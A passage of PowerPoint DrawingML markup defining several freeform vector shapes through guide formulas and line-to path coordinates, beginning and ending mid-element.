                    <a:lnTo>
                      <a:pt x="42" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="6"/>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20" name="Freeform 101"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="731" y="2487"/>
                <a:ext cx="11" cy="7"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 34"/>
                  <a:gd name="T1" fmla="*/ 0 h 23"/>
                  <a:gd name="T2" fmla="*/ 0 w 34"/>
                  <a:gd name="T3" fmla="*/ 0 h 23"/>
                  <a:gd name="T4" fmla="*/ 0 w 34"/>
                  <a:gd name="T5" fmla="*/ 0 h 23"/>
                  <a:gd name="T6" fmla="*/ 0 w 34"/>
                  <a:gd name="T7" fmla="*/ 0 h 23"/>
                  <a:gd name="T8" fmla="*/ 0 w 34"/>
                  <a:gd name="T9" fmla="*/ 0 h 23"/>
                  <a:gd name="T10" fmla="*/ 0 w 34"/>
                  <a:gd name="T11" fmla="*/ 0 h 23"/>
                  <a:gd name="T12" fmla="*/ 0 w 34"/>
                  <a:gd name="T13" fmla="*/ 0 h 23"/>
                  <a:gd name="T14" fmla="*/ 0 w 34"/>
                  <a:gd name="T15" fmla="*/ 0 h 23"/>
                  <a:gd name="T16" fmla="*/ 0 w 34"/>
                  <a:gd name="T17" fmla="*/ 0 h 23"/>
                  <a:gd name="T18" fmla="*/ 0 w 34"/>
                  <a:gd name="T19" fmla="*/ 0 h 23"/>
                  <a:gd name="T20" fmla="*/ 0 w 34"/>
                  <a:gd name="T21" fmla="*/ 0 h 23"/>
                  <a:gd name="T22" fmla="*/ 0 w 34"/>
                  <a:gd name="T23" fmla="*/ 0 h 23"/>
                  <a:gd name="T24" fmla="*/ 0 w 34"/>
                  <a:gd name="T25" fmla="*/ 0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3"/>
                  <a:gd name="T41" fmla="*/ 34 w 34"/>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3">
                    <a:moveTo>
                      <a:pt x="17" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="21" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17"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21" name="Freeform 102"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="683" y="2485"/>
                <a:ext cx="46" cy="8"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 141"/>
                  <a:gd name="T1" fmla="*/ 0 h 25"/>
                  <a:gd name="T2" fmla="*/ 0 w 141"/>
                  <a:gd name="T3" fmla="*/ 0 h 25"/>
                  <a:gd name="T4" fmla="*/ 0 w 141"/>
                  <a:gd name="T5" fmla="*/ 0 h 25"/>
                  <a:gd name="T6" fmla="*/ 0 w 141"/>
                  <a:gd name="T7" fmla="*/ 0 h 25"/>
                  <a:gd name="T8" fmla="*/ 0 w 141"/>
                  <a:gd name="T9" fmla="*/ 0 h 25"/>
                  <a:gd name="T10" fmla="*/ 0 w 141"/>
                  <a:gd name="T11" fmla="*/ 0 h 25"/>
                  <a:gd name="T12" fmla="*/ 0 w 141"/>
                  <a:gd name="T13" fmla="*/ 0 h 25"/>
                  <a:gd name="T14" fmla="*/ 0 w 141"/>
                  <a:gd name="T15" fmla="*/ 0 h 25"/>
                  <a:gd name="T16" fmla="*/ 0 w 141"/>
                  <a:gd name="T17" fmla="*/ 0 h 25"/>
                  <a:gd name="T18" fmla="*/ 0 w 141"/>
                  <a:gd name="T19" fmla="*/ 0 h 25"/>
                  <a:gd name="T20" fmla="*/ 0 w 141"/>
                  <a:gd name="T21" fmla="*/ 0 h 25"/>
                  <a:gd name="T22" fmla="*/ 0 w 141"/>
                  <a:gd name="T23" fmla="*/ 0 h 25"/>
                  <a:gd name="T24" fmla="*/ 0 w 141"/>
                  <a:gd name="T25" fmla="*/ 0 h 25"/>
                  <a:gd name="T26" fmla="*/ 0 w 141"/>
                  <a:gd name="T27" fmla="*/ 0 h 25"/>
                  <a:gd name="T28" fmla="*/ 0 w 141"/>
                  <a:gd name="T29" fmla="*/ 0 h 25"/>
                  <a:gd name="T30" fmla="*/ 0 w 141"/>
                  <a:gd name="T31" fmla="*/ 0 h 25"/>
                  <a:gd name="T32" fmla="*/ 0 w 141"/>
                  <a:gd name="T33" fmla="*/ 0 h 25"/>
                  <a:gd name="T34" fmla="*/ 0 w 141"/>
                  <a:gd name="T35" fmla="*/ 0 h 25"/>
                  <a:gd name="T36" fmla="*/ 0 w 141"/>
                  <a:gd name="T37" fmla="*/ 0 h 25"/>
                  <a:gd name="T38" fmla="*/ 0 w 141"/>
                  <a:gd name="T39" fmla="*/ 0 h 25"/>
                  <a:gd name="T40" fmla="*/ 0 w 141"/>
                  <a:gd name="T41" fmla="*/ 0 h 25"/>
                  <a:gd name="T42" fmla="*/ 0 w 141"/>
                  <a:gd name="T43" fmla="*/ 0 h 25"/>
                  <a:gd name="T44" fmla="*/ 0 w 141"/>
                  <a:gd name="T45" fmla="*/ 0 h 25"/>
                  <a:gd name="T46" fmla="*/ 0 w 141"/>
                  <a:gd name="T47" fmla="*/ 0 h 25"/>
                  <a:gd name="T48" fmla="*/ 0 w 141"/>
                  <a:gd name="T49" fmla="*/ 0 h 25"/>
                  <a:gd name="T50" fmla="*/ 0 w 141"/>
                  <a:gd name="T51" fmla="*/ 0 h 25"/>
                  <a:gd name="T52" fmla="*/ 0 w 141"/>
                  <a:gd name="T53" fmla="*/ 0 h 25"/>
                  <a:gd name="T54" fmla="*/ 0 w 141"/>
                  <a:gd name="T55" fmla="*/ 0 h 25"/>
                  <a:gd name="T56" fmla="*/ 0 w 141"/>
                  <a:gd name="T57" fmla="*/ 0 h 25"/>
                  <a:gd name="T58" fmla="*/ 0 w 141"/>
                  <a:gd name="T59" fmla="*/ 0 h 25"/>
                  <a:gd name="T60" fmla="*/ 0 w 141"/>
                  <a:gd name="T61" fmla="*/ 0 h 25"/>
                  <a:gd name="T62" fmla="*/ 0 w 141"/>
                  <a:gd name="T63" fmla="*/ 0 h 25"/>
                  <a:gd name="T64" fmla="*/ 0 w 141"/>
                  <a:gd name="T65" fmla="*/ 0 h 25"/>
                  <a:gd name="T66" fmla="*/ 0 w 141"/>
                  <a:gd name="T67" fmla="*/ 0 h 25"/>
                  <a:gd name="T68" fmla="*/ 0 w 141"/>
                  <a:gd name="T69" fmla="*/ 0 h 25"/>
                  <a:gd name="T70" fmla="*/ 0 w 141"/>
                  <a:gd name="T71" fmla="*/ 0 h 25"/>
                  <a:gd name="T72" fmla="*/ 0 w 141"/>
                  <a:gd name="T73" fmla="*/ 0 h 25"/>
                  <a:gd name="T74" fmla="*/ 0 w 141"/>
                  <a:gd name="T75" fmla="*/ 0 h 25"/>
                  <a:gd name="T76" fmla="*/ 0 w 141"/>
                  <a:gd name="T77" fmla="*/ 0 h 25"/>
                  <a:gd name="T78" fmla="*/ 0 w 141"/>
                  <a:gd name="T79" fmla="*/ 0 h 25"/>
                  <a:gd name="T80" fmla="*/ 0 w 141"/>
                  <a:gd name="T81" fmla="*/ 0 h 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5"/>
                  <a:gd name="T125" fmla="*/ 141 w 141"/>
                  <a:gd name="T126" fmla="*/ 25 h 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5">
                    <a:moveTo>
                      <a:pt x="1" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="8" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1"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22" name="Freeform 103"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="642" y="2483"/>
                <a:ext cx="19" cy="10"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 58"/>
                  <a:gd name="T1" fmla="*/ 0 h 32"/>
                  <a:gd name="T2" fmla="*/ 0 w 58"/>
                  <a:gd name="T3" fmla="*/ 0 h 32"/>
                  <a:gd name="T4" fmla="*/ 0 w 58"/>
                  <a:gd name="T5" fmla="*/ 0 h 32"/>
                  <a:gd name="T6" fmla="*/ 0 w 58"/>
                  <a:gd name="T7" fmla="*/ 0 h 32"/>
                  <a:gd name="T8" fmla="*/ 0 w 58"/>
                  <a:gd name="T9" fmla="*/ 0 h 32"/>
                  <a:gd name="T10" fmla="*/ 0 w 58"/>
                  <a:gd name="T11" fmla="*/ 0 h 32"/>
                  <a:gd name="T12" fmla="*/ 0 w 58"/>
                  <a:gd name="T13" fmla="*/ 0 h 32"/>
                  <a:gd name="T14" fmla="*/ 0 w 58"/>
                  <a:gd name="T15" fmla="*/ 0 h 32"/>
                  <a:gd name="T16" fmla="*/ 0 w 58"/>
                  <a:gd name="T17" fmla="*/ 0 h 32"/>
                  <a:gd name="T18" fmla="*/ 0 w 58"/>
                  <a:gd name="T19" fmla="*/ 0 h 32"/>
                  <a:gd name="T20" fmla="*/ 0 w 58"/>
                  <a:gd name="T21" fmla="*/ 0 h 32"/>
                  <a:gd name="T22" fmla="*/ 0 w 58"/>
                  <a:gd name="T23" fmla="*/ 0 h 32"/>
                  <a:gd name="T24" fmla="*/ 0 w 58"/>
                  <a:gd name="T25" fmla="*/ 0 h 32"/>
                  <a:gd name="T26" fmla="*/ 0 w 58"/>
                  <a:gd name="T27" fmla="*/ 0 h 32"/>
                  <a:gd name="T28" fmla="*/ 0 w 58"/>
                  <a:gd name="T29" fmla="*/ 0 h 32"/>
                  <a:gd name="T30" fmla="*/ 0 w 58"/>
                  <a:gd name="T31" fmla="*/ 0 h 32"/>
                  <a:gd name="T32" fmla="*/ 0 w 58"/>
                  <a:gd name="T33" fmla="*/ 0 h 32"/>
                  <a:gd name="T34" fmla="*/ 0 w 58"/>
                  <a:gd name="T35" fmla="*/ 0 h 32"/>
                  <a:gd name="T36" fmla="*/ 0 w 58"/>
                  <a:gd name="T37" fmla="*/ 0 h 32"/>
                  <a:gd name="T38" fmla="*/ 0 w 58"/>
                  <a:gd name="T39" fmla="*/ 0 h 32"/>
                  <a:gd name="T40" fmla="*/ 0 w 58"/>
                  <a:gd name="T41" fmla="*/ 0 h 32"/>
                  <a:gd name="T42" fmla="*/ 0 w 58"/>
                  <a:gd name="T43" fmla="*/ 0 h 32"/>
                  <a:gd name="T44" fmla="*/ 0 w 58"/>
                  <a:gd name="T45" fmla="*/ 0 h 32"/>
                  <a:gd name="T46" fmla="*/ 0 w 58"/>
                  <a:gd name="T47" fmla="*/ 0 h 32"/>
                  <a:gd name="T48" fmla="*/ 0 w 58"/>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32"/>
                  <a:gd name="T77" fmla="*/ 58 w 58"/>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32">
                    <a:moveTo>
                      <a:pt x="3" y="10"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="7" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="1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23" name="Freeform 104"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="620" y="2484"/>
                <a:ext cx="12" cy="14"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 39"/>
                  <a:gd name="T1" fmla="*/ 0 h 41"/>
                  <a:gd name="T2" fmla="*/ 0 w 39"/>
                  <a:gd name="T3" fmla="*/ 0 h 41"/>
                  <a:gd name="T4" fmla="*/ 0 w 39"/>
                  <a:gd name="T5" fmla="*/ 0 h 41"/>
                  <a:gd name="T6" fmla="*/ 0 w 39"/>
                  <a:gd name="T7" fmla="*/ 0 h 41"/>
                  <a:gd name="T8" fmla="*/ 0 w 39"/>
                  <a:gd name="T9" fmla="*/ 0 h 41"/>
                  <a:gd name="T10" fmla="*/ 0 w 39"/>
                  <a:gd name="T11" fmla="*/ 0 h 41"/>
                  <a:gd name="T12" fmla="*/ 0 w 39"/>
                  <a:gd name="T13" fmla="*/ 0 h 41"/>
                  <a:gd name="T14" fmla="*/ 0 w 39"/>
                  <a:gd name="T15" fmla="*/ 0 h 41"/>
                  <a:gd name="T16" fmla="*/ 0 w 39"/>
                  <a:gd name="T17" fmla="*/ 0 h 41"/>
                  <a:gd name="T18" fmla="*/ 0 w 39"/>
                  <a:gd name="T19" fmla="*/ 0 h 41"/>
                  <a:gd name="T20" fmla="*/ 0 w 39"/>
                  <a:gd name="T21" fmla="*/ 0 h 41"/>
                  <a:gd name="T22" fmla="*/ 0 w 39"/>
                  <a:gd name="T23" fmla="*/ 0 h 41"/>
                  <a:gd name="T24" fmla="*/ 0 w 39"/>
                  <a:gd name="T25" fmla="*/ 0 h 41"/>
                  <a:gd name="T26" fmla="*/ 0 w 39"/>
                  <a:gd name="T27" fmla="*/ 0 h 41"/>
                  <a:gd name="T28" fmla="*/ 0 w 39"/>
                  <a:gd name="T29" fmla="*/ 0 h 41"/>
                  <a:gd name="T30" fmla="*/ 0 w 39"/>
                  <a:gd name="T31" fmla="*/ 0 h 41"/>
                  <a:gd name="T32" fmla="*/ 0 w 39"/>
                  <a:gd name="T33" fmla="*/ 0 h 41"/>
                  <a:gd name="T34" fmla="*/ 0 w 39"/>
                  <a:gd name="T35" fmla="*/ 0 h 41"/>
                  <a:gd name="T36" fmla="*/ 0 w 39"/>
                  <a:gd name="T37" fmla="*/ 0 h 41"/>
                  <a:gd name="T38" fmla="*/ 0 w 39"/>
                  <a:gd name="T39" fmla="*/ 0 h 41"/>
                  <a:gd name="T40" fmla="*/ 0 w 39"/>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41"/>
                  <a:gd name="T65" fmla="*/ 39 w 39"/>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41">
                    <a:moveTo>
                      <a:pt x="0" y="36"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="5" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="36"/>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24" name="Freeform 105"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="604" y="2491"/>
                <a:ext cx="39" cy="26"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 118"/>
                  <a:gd name="T1" fmla="*/ 0 h 83"/>
                  <a:gd name="T2" fmla="*/ 0 w 118"/>
                  <a:gd name="T3" fmla="*/ 0 h 83"/>
                  <a:gd name="T4" fmla="*/ 0 w 118"/>
                  <a:gd name="T5" fmla="*/ 0 h 83"/>
                  <a:gd name="T6" fmla="*/ 0 w 118"/>
                  <a:gd name="T7" fmla="*/ 0 h 83"/>
                  <a:gd name="T8" fmla="*/ 0 w 118"/>
                  <a:gd name="T9" fmla="*/ 0 h 83"/>
                  <a:gd name="T10" fmla="*/ 0 w 118"/>
                  <a:gd name="T11" fmla="*/ 0 h 83"/>
                  <a:gd name="T12" fmla="*/ 0 w 118"/>
                  <a:gd name="T13" fmla="*/ 0 h 83"/>
                  <a:gd name="T14" fmla="*/ 0 w 118"/>
                  <a:gd name="T15" fmla="*/ 0 h 83"/>
                  <a:gd name="T16" fmla="*/ 0 w 118"/>
                  <a:gd name="T17" fmla="*/ 0 h 83"/>
                  <a:gd name="T18" fmla="*/ 0 w 118"/>
                  <a:gd name="T19" fmla="*/ 0 h 83"/>
                  <a:gd name="T20" fmla="*/ 0 w 118"/>
                  <a:gd name="T21" fmla="*/ 0 h 83"/>
                  <a:gd name="T22" fmla="*/ 0 w 118"/>
                  <a:gd name="T23" fmla="*/ 0 h 83"/>
                  <a:gd name="T24" fmla="*/ 0 w 118"/>
                  <a:gd name="T25" fmla="*/ 0 h 83"/>
                  <a:gd name="T26" fmla="*/ 0 w 118"/>
                  <a:gd name="T27" fmla="*/ 0 h 83"/>
                  <a:gd name="T28" fmla="*/ 0 w 118"/>
                  <a:gd name="T29" fmla="*/ 0 h 83"/>
                  <a:gd name="T30" fmla="*/ 0 w 118"/>
                  <a:gd name="T31" fmla="*/ 0 h 83"/>
                  <a:gd name="T32" fmla="*/ 0 w 118"/>
                  <a:gd name="T33" fmla="*/ 0 h 83"/>
                  <a:gd name="T34" fmla="*/ 0 w 118"/>
                  <a:gd name="T35" fmla="*/ 0 h 83"/>
                  <a:gd name="T36" fmla="*/ 0 w 118"/>
                  <a:gd name="T37" fmla="*/ 0 h 83"/>
                  <a:gd name="T38" fmla="*/ 0 w 118"/>
                  <a:gd name="T39" fmla="*/ 0 h 83"/>
                  <a:gd name="T40" fmla="*/ 0 w 118"/>
                  <a:gd name="T41" fmla="*/ 0 h 83"/>
                  <a:gd name="T42" fmla="*/ 0 w 118"/>
                  <a:gd name="T43" fmla="*/ 0 h 83"/>
                  <a:gd name="T44" fmla="*/ 0 w 118"/>
                  <a:gd name="T45" fmla="*/ 0 h 83"/>
                  <a:gd name="T46" fmla="*/ 0 w 118"/>
                  <a:gd name="T47" fmla="*/ 0 h 83"/>
                  <a:gd name="T48" fmla="*/ 0 w 118"/>
                  <a:gd name="T49" fmla="*/ 0 h 83"/>
                  <a:gd name="T50" fmla="*/ 0 w 118"/>
                  <a:gd name="T51" fmla="*/ 0 h 83"/>
                  <a:gd name="T52" fmla="*/ 0 w 118"/>
                  <a:gd name="T53" fmla="*/ 0 h 83"/>
                  <a:gd name="T54" fmla="*/ 0 w 118"/>
                  <a:gd name="T55" fmla="*/ 0 h 83"/>
                  <a:gd name="T56" fmla="*/ 0 w 118"/>
                  <a:gd name="T57" fmla="*/ 0 h 83"/>
                  <a:gd name="T58" fmla="*/ 0 w 118"/>
                  <a:gd name="T59" fmla="*/ 0 h 83"/>
                  <a:gd name="T60" fmla="*/ 0 w 118"/>
                  <a:gd name="T61" fmla="*/ 0 h 83"/>
                  <a:gd name="T62" fmla="*/ 0 w 118"/>
                  <a:gd name="T63" fmla="*/ 0 h 83"/>
                  <a:gd name="T64" fmla="*/ 0 w 118"/>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83"/>
                  <a:gd name="T101" fmla="*/ 118 w 118"/>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83">
                    <a:moveTo>
                      <a:pt x="3" y="75"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="9" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="75"/>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25" name="Freeform 106"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="482" y="2551"/>
                <a:ext cx="61" cy="24"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 188"/>
                  <a:gd name="T1" fmla="*/ 0 h 71"/>
                  <a:gd name="T2" fmla="*/ 0 w 188"/>
                  <a:gd name="T3" fmla="*/ 0 h 71"/>
                  <a:gd name="T4" fmla="*/ 0 w 188"/>
                  <a:gd name="T5" fmla="*/ 0 h 71"/>
